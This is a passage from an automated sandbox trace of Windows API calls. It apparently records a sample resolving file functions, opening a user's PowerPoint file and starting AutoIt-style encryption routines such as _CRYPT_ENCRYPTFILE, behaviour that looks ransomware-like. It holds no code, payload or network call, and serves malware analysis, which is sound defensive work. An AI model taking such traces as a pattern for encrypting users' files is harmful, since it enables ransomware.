lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0081.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.467] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0081.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0081.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0081.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0081.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0081.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0081.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0081.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0081.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0081.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0081.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0081.468] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\HGH4Uw7jgwUTEi7Vo_.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\hgh4uw7jgwutei7vo_.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0081.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0081.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0081.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0081.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0081.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0081.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0081.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0081.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0081.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0081.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0081.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0081.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0081.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0081.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0081.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0081.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0081.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0081.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0081.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0081.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0081.470] FreeLibrary (hLibModule=0x772d0000) returned 1 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4a58 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.472] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.472] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0081.472] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0081.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0081.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0081.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cae20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0081.475] CloseHandle (hObject=0x258) returned 1 [0081.475] FreeLibrary (hLibModule=0x772d0000) returned 1 [0081.475] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0081.475] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\HGH4Uw7jgwUTEi7Vo_.ppt", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7888de10, ftCreationTime.dwHighDateTime=0x1d5e9d1, ftLastAccessTime.dwLowDateTime=0xfccc9c0, ftLastAccessTime.dwHighDateTime=0x1d5ec6c, ftLastWriteTime.dwLowDateTime=0xfccc9c0, ftLastWriteTime.dwHighDateTime=0x1d5ec6c, nFileSizeHigh=0x0, nFileSizeLow=0x17655, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="HGH4Uw7jgwUTEi7Vo_.ppt", cAlternateFileName="HGH4UW~1.PPT")) returned 0x41ac500 [0081.475] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0081.475] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0081.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.475] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0081.475] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.475] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0081.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0081.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0081.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ee8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0081.476] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a40c8) returned 1 [0081.476] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0081.476] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0081.476] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0081.476] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0081.477] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.477] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0081.533] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.533] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0081.533] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.534] WideCharToMultiByte (in: 